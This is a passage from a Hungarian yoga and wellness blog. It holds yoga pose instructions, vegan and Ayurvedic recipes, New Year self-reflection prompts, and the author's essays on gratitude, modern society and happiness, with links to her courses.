kerüljenek. - Nyomd le a jobb talpad a talajba, hogy a térded és a bokád egymás fölött maradjon. - Belégzéssel emeld el a hátsó lábad a talajról és nyújtózz meg a sarkaddal hátrafelé a levegőben. - Told a tenyereket vagy az ujj begyeket a talajba. - Emeld ki a fejed és nyújtozz a fejtetővel is. Folyamatosan legyen meg az ászana kivitelezése közben a nyújtózás érzése a testedben. Figyelj, hogy a fejed ne lógjon, hanem legyen megtartott és belégzéssel aktívan nyújtózz a fejtetővel és szegycsonttal. Kilégzéssel a tenyereidet vagy az ujjbegyeidet told a talajba. A lenyomott tenyerekből a vállakat húzd hátra, a lapockáidat közelítsd egymáshoz és húzd a derekad irányába. Ne engedd, hogy a fülek közel kerüljenek a válladhoz. A hasadat aktívan tartsd meg. Belégzéssel a hátul kinyújtott lábad sarkát nyújtsd el magadtól hosszasan. A hátul lévő lábad farizmát aktivizáld és a hátsó sarkaddal nyújtózz hátrafelé, a lábadat tartsd aktívan. Ha szükséges nézd meg a hátul lévő lábfejed és ha a lábfejed, sarkad nem merőleges a talajra, akkor a combodat csavard picit, hogy a lábfejed merőleges legyen a talajra. Elől a térd és boka maradjon egymás felett és kilégzéssel a talpadat told a talajba. Próbáld legalább 20-30 másodpercig megtartani a pózt. Kijövetel a pózból: Kilégzéssel engedd le a hátul lévő bal térded a talajra és cseréld meg a lábtartást. Az ászanát felveheted álló helyzetből Uttanászanából hátra lépve is. Ha a mellkasi területed nagyon merev, ha a nyak vállöv területét nehéz megtartani, akkor a kezeid alá tegyél jógablokkokat vagy néhány lexikont:) Ha ezt a változatot nehéz megtartani a hátsó lábszárat, térdet tedd le a talajra. Ha érzékeny a térded tegyél alá plédet. Ha görcsölni kezd a lábafejed, talpad, akkor a bokád alá tegyél egy összehajtott plédet/törölközőt vagy tedd lábujjhegyre a lábad. Ne végezd a gyakorlatot ha a csípőízületedben valamilyen komoly gyulladásos probléma van. A jógagyakorlatokat először mindig hozzáértő jógaoktatóval sajátítsd el. Ha szeretnél jógában elmélyedni, elsajátítani a pózok helyes kivitelezését, szeretettel várunk Kezdő Jógatanfolyamainkra és személyre szabott, igényeidhez, aktuális állapotodhoz igazított magán órákra. https://www.eljharmoniaban.hu/kezdo-jogatanfolyam Jó gyakorlást kívánok:) szeretettel: Kati
Rizsleves
2023. január 18. Élj harmóniában
Vannak olyan időszakok, amikor az ember emésztőrendszere túlterhelt és csak valami könnyűre vágyik. Az ájurvédában ilyen a rizsleves, ami könnyű és tápláló. A rizsleves javítja az emésztést, segít a méregtelenítésben, jótékony székrekedés esetén és legyengült állapotoknál. Ha úgy érzed szeretnéd a szervezetedet megszabadítani a felgyült salakanyagoktól, szeretettel látlak az általam vezetett otthoni online tisztítás programra, ahol napról, napra kísérlek végig egy csodálatos ájurvédikus tisztításon. Tapasztald meg a könnyedséget, a jó emésztést, a zavartalan, tiszta gondolatokat. https://www.eljharmoniaban.hu/tisztitas Hozzávalók 1/4 csésze rizs basmati 2 csésze víz 1 teáskanál ghí himalája só római kömény (por) feketebors Mosd meg a rizst és közepes lángon a vízzel főzd fedő nélkül puhára. Ha jól megfőtt, a rizs igazán puha, akkor tedd hozzá a ghít és tegyél hozzá sót és a fűszereket - köményport és fekete borsot. Kipróbálhatod más fűszerezéssel is. Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Egészségedre:) szeretettel: KAti
Így kezd neki az új évnek - 2023.
2022. december 31. Élj harmóniában
Már csak egy kis idő választ el a 2023-as év kezdetétől és iylenkor érdemes átgondolni az eltelt évet és január elején pedig érdemes tudatosan tervezni a következő időszakot. Ilyenkor hasznos ha megpróbálod tudatosan elengedni ami volt és tudatosan felkészülni a következő évre. Próbáld mindenben a jót látni. Ahhoz, hogy a következő éved sikeres legyen az első lépés a tudatos tervezés. Önmagában a nagy fogadalmak, nem segítenek minket hozzá egy boldogabb, kiegyensúlyozottabb élethez. A siker titka, hogy belső világunkat rendezzük. Húzz egy vonalat képzeltedben és szemléld végig, milyen is volt az eltelt éved. Majd az előző év tapasztalataiból kiindulva, lehetőséged van arra, hogy átgondold mit szeretnél másképpen csinálni a következő évben. Ebben a bejegyzésben ehhez minden támogatást megpróbálok megadni Neked. Talán az elmúlt évek segítettek a társadalom tagjainak áthelyezni a fókuszpontokat, az anyagi javak halmozása felől az egészség és az emberi kapcsolatok irányba. Az első amit egy év végén át szoktam gondolni kinek vagy éppen miért vagyok hálás az eltelt évben. A Hála lista készítéséről az alábbi bejegyzésben olvashatsz: https://eljharmoniaban.blogspot.com/2019/01/hala-koszonet.html A sikeres változtatáshoz, nagyon fontos, hogy komolyan határozd el pontosan miben szeretnél változtatni és légy tudatos arról, hogyan érheted el. Ne csak azt gondold, "majd rendszeresen mozgok" vagy "majd nem idegeskedem annyit " vagy "többet találkozom szeretteimmel" mert eltelik 2023 és újra azt fogod gondolni, na majd jövőre... Bármi amiben az életben siekres szeretnél lenni, eredméynt szeretnél elérni arra időt, energiát, pénzt kell szánni... Ha nem csinálsz, időt, teret annak amit szeretnél, hogy az életedben megnyilvánuljon, soha nem fog megérkezni A másik pont, amin el lehet bukni, hogy egyszerre túl sok célt tűzől ki magad elé. Ne akarj egy év alatt mindent teljesen megváltoztatni, nézd meg mely célok, változások reálisak az egy éves távlatra. Az elmúlt időszak átgondolásánál talán segít, ha szem előtt tartod, hogy bármi is történt Veled, az mindig érted van és a fejlődésedet szolgálja. Még akkor is ha az adott pillanatban úgy tűnik, hogy ez nem lesz a hasznodra és inkább érzed kényelmetlennek, kellemetlennek, mint jótékonynak. Néha az életünk leginkább rémes helyzeteinek, személyeinek köszönhetjük, hogy türelmet, alázatot, egyszerűséget, önzetlenséget, lemondást vagy éppen elengedést tanulhatunk. Sokszor ha visszatekintünk az életünkre rájövünk, milyen hálásak lehetünk egy-egy olyan életeseménynek, amit, akkor nagyon rossznak éltünk meg. Egy korábbi bejegyzésben erről olvashatsz: Sosem látod a teljes képet... Nem csak az év vége, hanem minden egyes napod új lehetőségeket, új tapasztalatokat hoz számodra. Járj mindig nyitott szemmel, figyeld mit hoz az élet, figyeld merre mennek a sínek. A nyitottság és az elfogadás, a rugalmasság fogja számodra biztosítani, hogy a következő éved igazán sikeres legyen... Mit jelent, hogy sikeres? Talán azt gondolod, hogy most a szokásos dolgokat fogom ideírni... jó állás van, jó fizetés, autó, elismerés, hírnév, tisztelet, valamiben jónak lenni, tehetség.... Sikeres az, aki boldog, elégedett önmagában, kiegyensúlyozott, egészséges, tökéletes harmóniában él önmagával és környezetével - a jóga a sikert az önmegvalósítás elérésével definiálja. Ha úgy érzed a mostani életed, a fentiek alapján nem annyira sikeres, akkor tegyél érte, hogy a következő évben, Te is boldog és kiegyensúlyozott legyél. Lásd a változás szükségességét, mert ha ugyanazt csinálod mint eddig, akkor sajnos ugyanazt az eredményt fogod kapni. A változás amit szeretnél érintheti az egészséged, életmódod, személyiséged fejlesztését, gondolkodásod változtatását, emberi kapcsolataidat vagy bármilyen olyan dolgot, amiben szeretnél más eredményt látni a következő évben. Gondold át a céljaidat és komolyan kötelezd el magad mellettük. Határozd meg mit szeretnél másképpen a jövőben és tudatosan gondold át, hogyan tudod elérni. Majd szeretettel, türelemmel lépésről, lépésre haladj a megvalósítás útján. Néhány hasznos gondolat amit érdemes átgondolnod, mielőtt lezárnád a 2022-es évet. Már csak egy kis idő és vége 2022-es évnek. Mielőtt átlépsz az új évbe, néhány dolgot érdemes tudatosan átgondolnod. Hogyan jellemeznéd ezt az évet röviden? Mik voltak az év legfontosabb eseményei? Mik voltak az év legjobb pillanatai, minek örültél idén? Milyen sikereid voltak? Milyen sikerei voltak másoknak, aminek örültél? Mi okozott számodra bánatot, rossz érzéseket idén? Kik segítettek terveid alakulásában, kiknek vagy hálás? Milyen lépéseket tettél ahhoz, hogy egyre jobban érezd magad és fejlődj? Mi jellemezte a kapcsolatodat Önmagaddal? Hogyan bánsz Önmagaddal? Elégedett vagy-e az életedben a bensőségességgel, meghittséggel, mélységgel, őszinteséggel? Gondold át a kapcsolataidat másokkal. Hogyan kommunikálsz, reagálsz, szeretsz, viszonzol? Hogyan bánsz másokkal - azokkal akiket szeretsz és azokkal akiket nem kedvelsz? Milyen volt a párkapcsolatod, baráti kapcsolataid, munkahelyi kapcsolataid? Kikkel kötöttél barátságot? Kikkel sikerült kibékülnöd, rendezi a kapcsolatod? Hogy érzed magad testileg és lelkileg? Van benned belső harmónia, nyugalom? Otthon érzed Önagadban magad? Milyen volt az egészséged, közérzeted, energiaszinted? Mennyire figyeltél a táplálkozásra, testmozgásra, pihenésre, napirendre? A mindennapi döntéseid hogyan hatnak arra, hogyan érzed magad? Szánsz időt, energiát arra a hétköznapokban, hogy foglalkozz a belső békéddel, az egészségeddel, testi-lelki jólléteddel? Mennyire vagy ráhangolódva a természetre? Sikerül a természettel összhangban élned? Van kapcsolatod az évszakokkal, fákkal, virágokkal, hegyekkel, kék éggel, folyókkal a nap és a hold váltakozásával? Mikor nézted legutóbb a kék eget vagy a naplementét vagy a holdfelkeltét? Mennyi móka, nevetés, öröm van az életedben? Mikor nevettél legutóbb annyira, hogy kifolytak a könnyeid? Mikor volt olyan örömérzeted, amit az egész testedben éreztél? Szánsz időt arra a hétköznapokban, hogy nevess, viccelj? Mit tanultál idén, miben sikerült fejlődnöd? Milyen rossz tulajdonságoktól sikerült megszabadulnod? Milyen változásokon mentél át amire büszke vagy? Vannak spirituális céljaid? Hogyan táplálod a lekedet? Mi hiányzik az életedből? Mit szeretnél másképpen csinálni? Mihez lenne szükséges, hogy időt, teret csinálj neki. Í rd össze a dolgaidat, átgondoltan, tudatosan a 2023-as évre vonatkozóan is - ne rutinb ó l készíts listát , légy őszinte magadhoz, nézz a szíved mélyére valójában mire vágysz, mit szeretnél. Ha van egy cél amit kitűzöl, akkor képzeld el, milyen érzés lesz ha megvalósul. Ha ez nem jó érzésekkel tölt el, hanem negatív érzetek, szorongás, félelem társul hozzá, akkor jó ha újra átgondolod valóban ez egy célod-e vagy esetleg csak valamilyen elvárásnak, külső nyomásnak szeretnél megfelelni. N e ragaszkodj mindig a megszokott dolgokhoz. Légy nyitott p róbálj ki új dolgokat, tanulj új ismereteket, szerezz új tapasztalatokat. Egy kis segítség ahhoz, hogy a 2023-as éved sikeres legyen : Mit szeretnél elérni, megvalósítani 2023-ban? - írd össze a céljaidat, terveid. Mik lesznek az év fontosabb eseményei? Miben szeretnél fejlődni, mit szeretnél tanulni? Milyen kapcsolatot szeretnél kialakítani Önmagaddal? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy haladj az önismeret útján, hogy változtasd az Önmagadhoz fűződö viszonyodat? Milyen kapcsolatot szeretnél másokkal? - család, barátok, párod, munkahelyi kapcsolatok. Hogyan szeretnél bánni másokkal? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy változtasd az emberi kapcsolataidat? Milyennek szeretnéd látni a közérzeted, belső harmóniád, energia szinted, egészséged, táplálkozásod, testmozgásod és a spiritualisát az életedben? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy jobban érezd magad? Hogyan szeretnéd alakítani a kapcsolatodat a természettel? Mit szeretnél tudatosabban csinálni? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy változtasd a kapcsolatod a természettel? Mennyire örömtelinek, vidámnak szeretnéd az elkövetkezendő évet? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy többet nevess, hogy vidámabb legyél? Miben szeretnél fejlődni? Mit szeretnél tanulni? Milyen kedvezőtlen szokásaidtól vagy éppen rossz tulajdonságaidtól szeretnél megszabadulni? Milyen változásokat szeretnél az életedben? Milyen elképzeléseid vannak a spirituális (lelki) gyakorlataidról? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy fejlődj? Mit szeretnél megvalósítani, megváltoztatni, máshogyan csinálni a következő évben? Mit tervezel tenni, mennyi időt és teret engedsz annak, hogy tudj változtatni? Hasznos az is ha átlapozod a naptárad is és előre betervezed, a főbb eseményeket - családi rendezvények, munkahelyi programok, nyaralás, kisebb pihenések, utazások, kulturális rendezvények, iskolai események, etc). Ez majd ad egy keretet az évednek. Legyen meg az elképzelésed arról is , mit hogyan szeretnél, de tartsd szem előtt, lehet, hogy neked van egy terved, és Istennek is van egy terve és a kettő nem mindig egyezik meg egymással. Engedd el a ragaszkodásaidat a jövődet illetően is... ez a világ a változásokról szól . Ha az események nem az elképzeléseid szerint alakulnak, ne akadj fenn, l égy rugalmas, mint a viharban azok a fák, amelyek nem törtnek össze, mert folyamatosan hajlonganak. L égy kész a változásra. Figyeld mindig merre mennek a sínek, és haladj az utadon, ne akarj minden áron egy akadálypályához görcsösen ragaszkodni. A világ nem f og megváltozni körülötted. Ne várd el a világtól, az emberektől, hogy megváltozzanak és minden úgy alakuljon ahogy Te szeretnéd. Bánj a dolgokkal, a személyekkel a természetük szerint. Minden helyzetben Te magad tudsz megváltozni, másképpen gondolkodni, másképpen hozzáállni a dolgokhoz. Higgy benne, hogy a dolgok mindig úgy alakulnak, ahogy azoknak alakulniuk kell . Ha megváltoztatod a gondolataidat, megváltozik az életed. Lásd a dolgok jó részét, légy rugalmas, pozitív, nyitott, türelmes és szeretetteljes. Tudj elégedett lenni, mosolyogj, szeress, adakozz, légy nagylelkű és kegyes és fejlődj sokat az új évben :) Ha személyre szabott megoldást szeretnél a problémáidra, jó lenne ha egy tapasztalt szakember lépésről, lépésre kísérne a változás útján egyéni igényeidnek megfelelően, szeretettel várlak egyéni konzultációkra, életmódtanácsadásra. https://www.eljharmoniaban.hu/eletmodtanacsadas Sok szeretettel kívánok spirituális élményekben gazdag, harmonikus Új évet Kati
Nyers-vegán mákos bejgli (gluténmentes)
A bejgli eredetileg Szilézia vidékéről származik. Ez a sziléziai kalácsfajta a 14. század óta ismert Európában. A bejgli (németül beugen = meghajlít, mohnbeugel = mákos kifli/bejgli) osztrák közvetítéssel érkezett hazánkba és terjedt el a 19. század második felében. Magyarországon ekkortól kezdték német divat szerint ünnepelni a karácsonyt. Eleinte családi ünnepek süteménye volt, majd a reformkortól kezdve fokozatosan felváltotta a hagyományos karácsonyi kalácsot. Bizonyára kezdetben, amikor Sziléziában vagy később, amikor már Magyarországon is elterjedt, készítői nem gondolkodtak azon, hogyan lehet ezt a finomságot úgy elkészíteni, hogy ne kelljen sütni, ráadásul liszt nélkül, sőt tojás és bármiféle zsiradék, na de hogy cukor hozzáadása nélkül! Napjaink fejlett konyhatechnikája és a nyers étkezést folytatók leleménye meghozta a bejglit a nyers (élő, sütés nélküli) sütemények világába is. Rendkívül előnyös, hogy a "tésztáját" akár hetekkel, hónapokkal előre elkészítheted. Nekem 3-4 hónapot várakozott az egyik lap (száraz helyen), mire oda jutottam, hogy megtöltöttem, felcsavartam. Nem lett semmi baja. El is fogyott. Másik előnye, hogy ha már van hozzá lapod, amit megtöltesz és feltekersz, szintén eláll akár egy hétig is (hacsak nem fogy el). Harmadik előnye, hogy egészséges, mivel csak rostokat tartalmaz, a benne lévő természetes cukrok felszívódása sem olyan gyors mint pl. a hagyományos bejglié. Negyedik előnye, hogy sokkal kevesebb időt kell eltölts vele, mint a hagyományos bejglivel, hiszen az aszalás ha időigényes is, de nem kell ott állj, várj, hanem közben millió dolgot elvégezhetsz, vagy akár aludhatsz is (ha éjszaka aszalsz).
A recept
Hozzávalók a "tésztához":
- 4-5 szem alma (kb. 50 dkg)
- kevés víz
- Opcionális: 1 vagy 2 banán ha édesebb "tésztát" szeretnénk
- Opcionális: 1/2 citrom leve ha világosabb "tésztát" szeretnénk
Elkészítés:
Az almákat meghámozzuk (a héjukat felhasználhatjuk müzlibe, vagy akár meg is ehetjük hámozás közben), apró darabokra vágjuk és egy turmixgép poharába tesszük. Magjait és magházát ne adjuk hozzá. Nagyon kevés vizet öntünk rá majd sűrű masszává turmixoljuk. Ahogy a hozzávalóknál írtam, banánt és vagy citromot adhatunk hozzá. Én csak almát és vizet használtam. Kb. fél cm vastagon elkenjük az aszaló lapon. Ha nincs aszalógép, se tálca hozzá, akkor egy tepsibe egy szilikonlapot fektetünk, arra öntjük rá a masszát, nyitott sütőt 50 fokra állítva hosszas órák alatt (8-10-12) megaszaljuk. Az aszalási idő függ attól, hogy mennyire vastag lapot készítünk. Sajnos sütőpapírt nem ajánlhatok ehhez a művelethez, mert összeráncosodik és nem lesz sima az almalap. Nehéz lesz leszedni róla. Ha szilikon lapon aszaljuk, akkor a végeredmény egy enyhén rugalmas almalap lesz.
Hozzávalók a mákos töltelékhez:
- 15 dkg mák
- 1 maroknyi datolya
- 1 bio citrom reszelt héja
- 1/2 citrom leve
Elkészítés:
A mákot érdemes 1-2 nappal előtte elkészítenünk. A mákot kevés vízben (épp csak ellepje) néhány órára beáztatjuk, majd leszűrjük, kiterítjük és ahogy az almalapot megaszaltuk, hasonlóan megszárítjuk, vagy fűtőtestre rakjuk a tálcát és ott szárítjuk. A datolyát kevés kézmeleg vízben felpuhítjuk (ha nem puha), majd aprító géppel összedaráljuk. A megszáradt, megdarált mákot pedig összekeverjük a datolyaszósszal. Ha nem elég kenhető, túl száraz, akkor kevés citromlét kanalazunk hozzá. A mák áztatásával aktiváljuk a bennük rejlő fitinsavat, így a mákban lévő ásványi anyagok felszívódása könnyebben megy végbe és gyomrunknak is könnyebbé válik az emésztése. Persze enélkül is elkészíthető. Mivel mi nem kizárólag nyersen étkezünk, tartok itthon beáztatott és megszárított mákot, és hagyományos mákot is. Amikor nyers sütit készítek, a beáztatott, megszárított mákot használom fel.
Tulajdonképpen ha a lapok már készen vannak, akkor a beigli elkészítése 10-15 perc, hiszen a megaszalt almalapra elegyengetjük a mákos tölteléket, majd akárcsak egy bejglit, felcsavarjuk. Érdemes 1-2 órát állni hagyni, mivel a szeletelés könnyebb lesz, ennyi idő alatt az almalap kissé felpuhul.
Fügés-körtés tejbegríz mogyoróvajjal
Gyerekkoromban szerettem a tejbegrízt leginkább kakaóval, néha fahéjjal megszórva. Bizonyára a legtöbb ember emlékeiben így él. Azonban gyümölccsel is nagyon finom. A mogyoróvaj pedig még különlegesebb ízt ad neki. Ősszel a füge és körte könnyebben is beszerezhető. Számomra nincs ősz füge nélkül, ahogy nyár sem dinnye nélkül. Emlékszem, amikor még Budán éltem, az épülethez tartozott egy kis hátsó kert, ahol egy hatalmas fügefa lakott. Még novemberben is simán volt rajta termés. Minden évben rengeteg gyümölcsöt hozott. Akkor kedveltem meg igazán a fügét. Azóta már különböző méretű és színű egyedeket ettem. Emlékszem egyik évben egy piacon akkora fügéket árultak, mint a tenyerem. Zöld és lila köntösben is találhatsz ilyen gyümölcsöt. Idén egy kirándulásos séta alkalmával pedig egy elhagyatott, útszéli fügebokorról szedhettem, aminek szinte fekete volt a "köntöse"- Belül rendkívül édes volt. Ha van lehetőséged fügéhez jutni (ne feledd, bizonyos helyeken vadon is megterem), tedd különlegessé a gyermekkori ételedet, a tejbegrízt vele.
A recept
Hozzávalók:
- Fél liter növényi tej (szerintem a zabtej a legjobb erre, de ha más tej van, azzal is elkészíthető)
- Néhány kanál tönköly búzadara (Kb 4 kanál)
- pár szem füge
- pár szem körte
- 1 evőkanál mogyoróvaj (elhagyható)
Elkészítés:
A növényi tejet tűzálló tálban felforraljuk, majd lassan hozzászórjuk a búzadarát, miközben folyamatosan kevergetjük. Mivel a gyümölcs eleve édes, nem édesítettem semmivel, de ez szabadon változtatható. Még mielőtt besűrűsödött volna, kb az evőkanálnyi mogyoróvaj felét hozzákevertem. Ettől szép sárgásabb színe lett. Amikor már elég sűrű, tányérokba adagoltam, fügével és körtével dekoráltam. A maradék mogyoróvajat pedig rácsepegtettem a gyümölcsökre és a tejbegrízre.
Majonézes krumplisaláta (vegán)
Krumpli, burgonya, pityóka, kolompér, vagy korompér, földialma, svábtök, mindegy is mi a neve, ha egyszer számos ételt készíthetünk belőle, vele. Sülve, főve, reszelve, kockázva, karikázva, változatossá teszi az étkezéseinket ez a gyökérgumó, ami Magyarországra 1650 körül jöhetett be bajor-osztrák közvetítéssel, de igazi elterjedése II. József magyar király adókedvezményeinek volt köszönhető. Amíg Magyarországon éltem, nem figyeltem fel nagyon arra, hogy hány és hány fajta burgonya létezik. Nyilván tudtam a batátáról, ami az édes krumpli és a hagyományos krumpliról, no meg az újkrumpliról. Itt, Angliában aztán csak rácsodálkoztam. Már azt is tudom, hogy a világon közel 200 fajta krumpli létezik. Választhatsz a széles kínálatból attól függően, hogy milyen ételt akarsz készíteni. Krumplipüréhez ajánlatos azt, ami gyorsan szétfő. Ehhez a salátához olyat válogattam, ami nem fő könnyen szét. Nem tudom már milyen neve volt. Az igazság az, hogy Olio appon keresztül ingyen jutottam hozzá pár kiló krumplihoz. Ez az egyik étel, ami lett belőle. Eheted pirítós kenyérrel, vagy (vegán) kolbásszal, vagy éppen a nagy nyári melegben, magában is. Ha szereted a zsenge újhagymát, vagy tavasszal a medvehagymát, érdemes apróra vágni őket és megszórni, akár bele is keverni.
A recept
Hozzávalók:
- Pár darab főtt krumpli vagy air fryerben hajában sült krumpli
- 2 zsenge újhagyma (opcionális)
- só
- 2 dl növényi joghurt
- 2 kanál növényi majonéz
- 1 kiskanál mustár (opcionális, én kihagytam)
Elkészítés:
A krumplit többféleképpen készíthetjük el. Én fogtam kb. 8 szem kisebb méretű krumplit, megmostam és air fryerben 15-20 perc alatt puhára sütöttem. Kicsit megvártam míg kihűlt, megpucoltam, felkockáztam és összeállítottam a salátát.
Másik verzió, hogy a krumplit egészben, héjában megfőzzük. Amikor már puha, leöntjük róla a forró vizet, majd hideg csapvizet engedünk rá, így gyorsan és könnyen tudjuk megpucolni a krumplikat. Ezután kockákra vágjuk.
Harmadik verzió, hogy a krumplit először megpucoljuk, felkockázzuk és annyi vízben, ami épp ellepi, egy kevés sóval puhára főzzük. A megfőtt krumplit leszűrjük és a kikevert majonézes szósszal, a felaprított hagymával összekeverjük.
A joghurtot, a majonézt és a mustárt összekeverjük egy tálban, míg a krumplik elkészülnek. Az arányok ízlés szerint változtathatók. A hagymákat apróra felvágjuk.
A megpárolt, leszűrt, krumplit a kész szósszal és a felaprított újhagymával (vagy lila hagymával) összekeverjük. El is készült a saláta. Érdemes hideg helyre tenni és megvárni míg lehűl.
Átalakulóban a világunk... modern nyugati jóléti társadalmak...
2022. július 22. Élj harmóniában
Átalakulóban a világunk... a modern nyugati jóléti társadalmakból, eltűnt a hála, a természet és az emberek tisztelete, a hit, Isten parancsainak követése, az önzetlenség, a belső erő, belső stabilitás és az önkontroll. Olyan társadalomban élünk, ahol a pénz és az ego van az első sorban. Az emberek el vannak kényeztetve önzőek, hedonisták, puhányak, kapzsik, pazarlóak, dühösek, irigyek, kockára teszik saját egészségüket és nem vállalnak felelősséget a saját életükért sem... Vajh meddig lehet ilyen mértékben kizsákmányolni a Földet, meddig maradhat fenn egy ilyen önző társadalom... ez a helyzet fenntarthatatlan... Soha nem volt olyan korszak, hogy ahhoz hogy pl. meleg legyen egy házban, lehessen fürdeni, étel legyen az asztalon ne kellett volna keményen és alázatosan tenni. Ma egy gombnyomásra meleg van a lakásokban, meleg vízben zuhanyozhatunk, pillanatok alatt lehet egy tál főtt ételt rendelni néhány kattintással, anélkül, hogy kapálni, leszedni, pucolni főzni kellene. Minden ősi kultúrban az emberek hálát adtak az ételért, a mai társadalom tagjai csak ráesnek a tányérra. Szuper életünk van és nem értékeljük... a fene nagy jólétben, úgy hogy megvan mindenünk sopánkodunk, irigykedünk a másikra, morgunk, kesergünk... egyre több a pánikbeteg, a depressziós ember, aki nem tudja feldolgozni az életét. Nem látjuk a mindennapi csodákat, nem tudjuk élvezni az életet, nincs hála a szívünkben. Mindenki csak elismerésre és anyagi javak felhalmozására vágyik és verseng másokkal. Nem elég az autó nagyobb kell, nem elég a hűtő abból jégkockagyártó kell, szükséges az új telefon, az új bútor, etc. Nem érték a hit, a szeretet, az egészség, a belső harmónia. Az emberek nem szánnak időt a belső elmélkedésre, önvizsgálatra, meditációra, imádságra, saját személyiségük fejlesztésre, tanulásra, egészségük megőrzésére, jó szokások kialakítására. A legtöbben ha éri őket valami nem állnak meg egy pillanatra átgondolni, hanem felelősöket keresnek, hőzöngenek és busonganak miért éppen velük történik.... Az, ami ér minket , egy társadalmat attól függ milyen kamát termelt meg magának. Sokszor elmondtam már, az életben bármit meg lehet tenni, de egyszer hozzák a számlát és ki kell fizetni. A társadalom kollektív tudata attól függ, hogy egyén szintjén hol állunk a személyiségünk fejlődésünkben. Az élet hozza az egyre erősebb tanításokat és az emberek még mindig nem látják, nem akarják látni, mit kell nekik változtatni, mit kellene egy egy helyzetből megtanulni, hogyan lehetne fejlődni. Mindig minden érted van és a fejlődésedet szolgálja. Ha magunktól nem fejlődünk, az élet rákényszerít betegségekkel, nehézségekkel, kapcsolati problémákkal, balesetekkel. Ha nem értjük, hogy ne pazaroljunk, ne nézzünk le másokat, ne utálkozzunk, dühöngjünk annyit, legyünk hálásak, éljünk mértéktartóan, vegyük figyelembe Isten és a természet törvényeit, akkor jönnek olyan körülmények, melyek segítenek megtanulni a leckét, és rá leszünk kényszerítve bizonyos dolgok megélésére, hogy fejlettebb legyen a személyiségünk és erősebb, jobb emberré válhassunk. Az önkontrollal rendelkező, nélkülözéshez, lemondáshoz szokott, anyagi vágyaktól mentes, egyszerű embereknek akinek tele a szíve szeretettel és hittel nem tud az élet olyan helyzetet hozni, ami nagy nehézséget okoz. Azoknak akik 1 órát nem bírnak ki Internet nélkül, akik 1 napot nem bírnak ki étel nélkül, akik nem tudnak autó nélkül eljutni a sarki boltig, akiknek a lét feltétele az ilyen olyan telefon, okosóra, akiknek nincs hitük, belső stabilitásuk, akik másoktól várják, hogy megoldják a problémákat és nem szeretnék látni, hogy ők ugyanúgy részei ennek és nekik maguknak kellene változatni és kár várni a szomszédra, a kormányra, az EU-ra, nekik nagyon fájó, nehéz, szenvedésekkel teli időszak következik... Ez a helyzet, a most következő időszak nagyon sok tanítást hordoz, saját döntésünk elébe megyünk, élünk a lehetőségekkel változtatunk életmódunkon, gondolkodásmódunkon, fejlődünk vagy szenvedünk és siránkozunk . Többet kellene befelé figyelni, újragondolni az embereknek mik az igazán fontos dolgok, változtatni a saját szokásaikon, személyiségükön, imádkozni, meditálni, hálásabbnak és kevésbbé szertelennek lenni. Nehéz időkben a legfontosabb, hogy az embernek legyen belső stablitása és egészséges legyen. Ha az önazonosságunk a külső tényezőktől függ sokat fogunk szenvedni. Az emberek a bankszámlát, kocsit, menő állásukat elveszíthetik , csökkenhet a kényelem, lehet többet kell fázni, kevesebbet lehet enni, pazarolni, utazgatni, de egy ember belső békéjét, stabilitását, hitét soha nem lehet elvenni. Addig érdemes változtatni, amíg magadtól teheted meg és nem az élet kényszerít rá. Gondold újra, hogyan tovább. Nehéz időkben, más dolgok válnak értékessé és kiderül, mi az ami valóban értéket képvisel. szeretettel: Kati
Sült sárgabarack fagyival (vegán)
Ismét egy recept, ami air fryerben (forró levegő sütőben) készült. Azért jó dolog egy ilyen készülék, mert a forróságban nem melegíti át a konyhát egy egész sütő üzemelése és mivel kisebb területet kell felfűtenie, gyorsabban is elkészülhetnek az ételek.
A recept
Hozzávalók:
- Néhány szem sárgabarack
- fagyi/jégkrém (vegán)
- air fryer vagy sütő
A sárgabarackokat megmossuk, ketté választjuk őket és kb. 15 perc alatt enyhén barnás színűre sütjük az air fryerben. Ha sütőben, tepsiben sütjük, nyilván tovább fog tartani.
A megsült barackokat tányérokra tesszük és jégrémet kanalazunk a tetejükre. Nekem kókuszos vegán jégkrém került rá. Ha a barackokat melegen tálaljuk, a jégkrém kissé megolvad a tetején. Gyors és finom élvezetet nyújt.
Akiknek ez így nem elég édes, megcsurgathatja valamilyen sziruppal (pl. agavé) vagy mézzel.
Arisztotelész - a boldogságról
2022. június 24. Élj harmóniában
A mai modern társadalmakban az emberek jelentős része jó körülmények között él, bővelkedik anyagi javakban, lehetőségekben. Hiába van hol lakni, jókat lehet enni, szép, tiszta ruhát hordani, az emberek lelkileg éhen halnak. Aki csak a testével törődik és a lélelekkel nem foglalkozik, sajnos soha nem lehet igazán boldog. A lelkileg éhező emberek addikciókba menekülnek - a függőségeknek se szeri, se száma (kávé, alkohol, cigaretta, vásárlás, film sorozat, édesség, munka, Internet és hosszasan sorolhatnám.) A lelki gyakorlatok segítenek, hogy közelebb kerülj Önmagadhoz és Istenhez. Összekapcsolódhatsz a belső határtalan erőforrásoddal, megtapaszthathatod a létezés boldog állapotát. A függőségeidtől megszabadulhatsz, ha a lekedet elkezded táplálni. Ima, japázás, meditáció, szent írások olvasása, tisztító erejű mantrák, szent énekek hallgatása, éneklése, papok, tanítok tanításainak olvasása, hallgatása, megszentelt étel fogyasztása, böjtölés, zarándoklat, lelki célokra adományozás. Törődj a lelkeddel is, mert ebben rejlik a boldogság titka
A ropogós kovászos uborka titka
Ha nem a saját kertedben szeded az uborkát, akkor menj a zöldségesbe, amikor friss áru érkezett. Akkor lesz igazán ropogós az uborka, ha minél kevesebb idő telik el a leszedéstől az üvegbe rakásig. Rövid időre áztasd hideg vízbe az uborkát, majd tisztítsd meg, vágd le a két végét és hosszában vágd...
Természet - örök szerelem
2022. május 30. Élj harmóniában
